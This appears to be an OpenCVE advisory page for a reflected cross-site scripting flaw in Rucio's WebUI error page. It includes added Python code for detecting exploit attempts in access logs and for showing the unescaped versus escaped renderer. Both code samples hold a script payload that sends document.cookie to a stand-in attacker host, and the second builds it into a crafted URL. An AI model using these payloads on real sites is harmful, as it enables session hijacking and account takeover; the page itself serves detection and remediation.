Description
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. A reflected Cross-site Scripting vulnerability was located in versions prior to 35.8.3, 38.5.4, and 39.3.1 in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Published: 2026-02-25
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑site scripting enabling theft of session tokens
Action: Patch Now
AI Analysis

Impact

Rucio's WebUI writes the ExceptionMessage of an unhandled error into its 500 error page without HTML-escaping it. An attacker who can trigger an exception whose message echoes attacker-controlled input, and who gets a victim to open a crafted URL, has script executed in the victim's browser within the WebUI's origin. The injection itself is reflected cross-site scripting (CWE-79); the second listed weakness, CWE-1004 (sensitive cookie without the HttpOnly flag), is what lets that script read the login session token via document.cookie and send it elsewhere. The result is hijack of the victim's authenticated session and unauthorized access to whatever data that session can reach.

Affected Systems

The issue affects Rucio (CPE vendor: cern), the framework large scientific collaborations use to manage and serve their datasets. The vulnerable component is the WebUI. Each supported release line has its own fix: every release older than 35.8.3 in the 35.x line, older than 38.5.4 in the 38.x line, or older than 39.3.1 in the 39.x line is vulnerable.

Risk and Exploitability

The CVSS v3.1 base score of 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N) rates the issue High: no privileges are needed, but the victim must open the crafted link. EPSS puts the exploitation probability below 1%, the CVE is not in the CISA KEV catalog, and the SSVC record below marks Exploitation as "poc", so a proof of concept exists but no in-the-wild exploitation is recorded on this page. The attacker needs a WebUI the victim can reach and a victim holding an active authenticated session who navigates to the crafted URL; with those prerequisites met, the injected script can exfiltrate the session token and the attacker can act as that user, compromising both confidentiality and integrity of the data the account can reach.

Generated by OpenCVE AI on April 17, 2026 at 14:59 UTC.
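The exploitation path described above leaves a recognisable trace in the front end's access log: a request whose query string carries executable markup and which the server answered with a 500. The following detection routine is an added example, not OpenCVE's or Rucio's code; the log lines, the /lookup and /search paths and the scope and q parameters are all constructed for illustration. It percent-decodes each request target (including double-encoded probes), looks for a script tag, an on* event handler or a javascript: URL, and marks the hits that also produced a 500 as the high-confidence ones for this CVE.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed Combined Log Format lines for a WebUI front end (not real
# Rucio logs); the paths and query parameters are hypothetical.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Feb/2026:20:30:01 +0000] "GET /lookup?scope=user.alice HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Feb/2026:20:31:14 +0000] "GET /lookup?scope=%3Cscript%3Enew%20Image%28%29.src%3D%27https%3A%2F%2Fattacker.example%2Fc%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 500 1024 "https://mail.example/" "Mozilla/5.0"
10.0.0.9 - - [25/Feb/2026:20:32:40 +0000] "GET /lookup?scope=%253Cimg%2520src%253Dx%2520onerror%253Dalert%25281%2529%253E HTTP/1.1" 500 1010 "-" "curl/8.5.0"
10.0.0.11 - - [25/Feb/2026:20:33:02 +0000] "GET /lookup?scope=nope HTTP/1.1" 500 980 "-" "Mozilla/5.0"
10.0.0.13 - - [25/Feb/2026:20:34:10 +0000] "GET /search?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from one log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Markup that executes: a script tag, an on* handler inside a tag, or a
# javascript: URL. Kept narrow so a bare '<' in ordinary data stays quiet.
MARKUP_RE = re.compile(
    r"<\s*script\b|<\s*[a-z][^>]*\son[a-z]+\s*=|javascript\s*:", re.IGNORECASE
)


def decode_target(target: str, rounds: int = 3) -> str:
    """Decode the request target as the server would, then keep decoding
    until stable so double-encoded probes are seen in their final form."""
    decoded = unquote_plus(target)      # first pass: form encoding, '+' is a space
    for _ in range(rounds - 1):         # further passes: plain percent-decoding only
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    return decoded


def find_xss_attempts(log_text: str) -> list:
    """One record per request whose decoded target carries executable markup.
    reflected_error=True marks the combination this CVE needs: the markup
    reached the server and the response was a 500."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_target(m["target"])
        if MARKUP_RE.search(decoded):
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": int(m["status"]),
                "target": decoded,
                "reflected_error": m["status"] == "500",
            })
    return hits


def high_confidence(hits: list) -> list:
    """Only the hits where the markup coincided with a 500 response."""
    return [h for h in hits if h["reflected_error"]]


if __name__ == "__main__":
    for hit in find_xss_attempts(SAMPLE_LOG):
        flag = "REFLECTED-500" if hit["reflected_error"] else "probe"
        print(f"{hit['ts']} {hit['ip']} {hit['status']} {flag} {hit['target']}")
```

The 500-with-markup hits are the ones to pivot on: check whether the source IP or referer appears in other sessions, and whether the victim account seen in that session authenticated again from an unfamiliar address shortly afterwards. Requests carrying markup that returned 200 are still worth keeping as low-confidence scanner activity.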

Remediation

Fixed in Rucio 35.8.3, 38.5.4 and 39.3.1 (one fix per supported release line); see the GitHub advisory GHSA-h79m-5jjm-jm4q. No vendor-provided workaround is recorded on this page.

OpenCVE Recommended Actions

  • Upgrade Rucio to the fixed release of the line you run: 35.8.3 for 35.x, 38.5.4 for 38.x or 39.3.1 for 39.x, then restart the WebUI
  • Until the upgrade lands, stop the WebUI from rendering exception text in its 500 page so attacker-influenced messages are never written into the response
  • HTML-escape all user-controlled data before rendering it in the UI, including text that reaches an error page indirectly through an exception message
  • Set the HttpOnly flag on the session cookie (the CWE-1004 weakness listed below) so a script injected by this or any future XSS cannot read the token from document.cookie

Generated by OpenCVE AI on April 17, 2026 at 14:59 UTC.
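The impact paragraph above describes the flaw as the exception text being rendered into the 500 page, and the recommended actions ask for HTML escaping and an HttpOnly session cookie. The code below is an added illustration of both points, not Rucio's code and not taken from the advisory: a hypothetical /lookup view whose error message echoes the scope parameter, a vulnerable 500 renderer beside the escaped one, a constructed cookie-stealing payload encoded into a crafted URL, and a check for whether a Set-Cookie header leaves the session readable by script. The host names, view name and parameter are assumptions.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed stand-in for a WebUI whose generic 500 handler writes the
# exception text into the page. Not Rucio's code; the names are hypothetical.
ERROR_PAGE = (
    "<html><body><h1>500 Internal Server Error</h1>"
    "<p>ExceptionMessage: {msg}</p></body></html>"
)


def render_500_vulnerable(exc: Exception) -> str:
    """Interpolates the raw exception text: any markup in it becomes live HTML."""
    return ERROR_PAGE.format(msg=str(exc))


def render_500_fixed(exc: Exception) -> str:
    """Escapes &, <, >, double and single quotes so the text is inert."""
    return ERROR_PAGE.format(msg=html.escape(str(exc), quote=True))


def lookup(url: str) -> str:
    """Hypothetical view: an unknown 'scope' value is echoed in the error."""
    scope = parse_qs(urlsplit(url).query).get("scope", [""])[0]
    if scope not in {"user.alice", "user.bob"}:
        raise ValueError(f"unknown scope {scope}")
    return scope


def handle(url: str, renderer) -> tuple:
    """Dispatch one request; any exception falls through to the 500 renderer."""
    try:
        return 200, f"<p>scope {lookup(url)}</p>"
    except Exception as exc:
        return 500, renderer(exc)


# Constructed payload: ship document.cookie to a host the attacker controls.
PAYLOAD = (
    "<script>new Image().src="
    "'https://attacker.example/c?'+document.cookie</script>"
)
# The link the victim is lured into opening; quote() percent-encodes the markup.
CRAFTED_URL = "https://rucio-ui.example/lookup?scope=" + quote(PAYLOAD)


def reflects_payload(body: str) -> bool:
    """True if the payload appears in the response unescaped, byte for byte."""
    return PAYLOAD in body


def script_can_read_cookie(set_cookie: str) -> bool:
    """Browsers keep HttpOnly cookies out of document.cookie (CWE-1004), so
    the injected script only obtains the session if the flag is missing."""
    attrs = [a.strip().lower() for a in set_cookie.split(";")]
    return "httponly" not in attrs


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_500_vulnerable),
                           ("fixed", render_500_fixed)):
        status, body = handle(CRAFTED_URL, renderer)
        print(f"{name}: status={status} reflected={reflects_payload(body)}")
    print("readable:", script_can_read_cookie("session=abc; Secure; SameSite=Lax"))
    print("readable:", script_can_read_cookie("session=abc; Secure; HttpOnly; SameSite=Lax"))
```

Both renderers answer the crafted URL with a 500; only the vulnerable one returns the script tag intact, while the fixed one returns it as &lt;script&gt; text. The cookie check is the second half of the remediation: escaping closes this injection, HttpOnly limits what the next one can steal.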

Advisories
Source        ID                    Title
GitHub GHSA   GHSA-h79m-5jjm-jm4q   Rucio WebUI has a Reflected Cross-site Scripting Vulnerability
History

Sat, 28 Feb 2026 05:15:00 +0000

Type      Values Removed   Values Added
Metrics                    ssvc {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 27 Feb 2026 15:45:00 +0000

Type                  Values Removed   Values Added
First Time appeared                    Cern; Cern rucio
CPEs                                   cpe:2.3:a:cern:rucio:*:*:*:*:*:*:*:*
Vendors & Products                     Cern; Cern rucio

Thu, 26 Feb 2026 13:30:00 +0000

Type                  Values Removed   Values Added
First Time appeared                    Rucio; Rucio rucio
Vendors & Products                     Rucio; Rucio rucio

Wed, 25 Feb 2026 19:45:00 +0000

Type          Values Removed   Values Added
Description                    Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. A reflected Cross-site Scripting vulnerability was located in versions prior to 35.8.3, 38.5.4, and 39.3.1 in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Title                          Rucio WebUI has a Reflected Cross-site Scripting Vulnerability
Weaknesses                     CWE-1004; CWE-79
References
Metrics                        cvssV3_1 {'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-26T20:44:57.174Z

Reserved: 2026-01-29T14:03:42.540Z

Link: CVE-2026-25136

Vulnrichment

Updated: 2026-02-26T20:44:49.572Z

NVD

Status : Analyzed

Published: 2026-02-25T20:23:47.273

Modified: 2026-02-27T15:43:26.510

Link: CVE-2026-25136

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-17T15:00:11Z

Weaknesses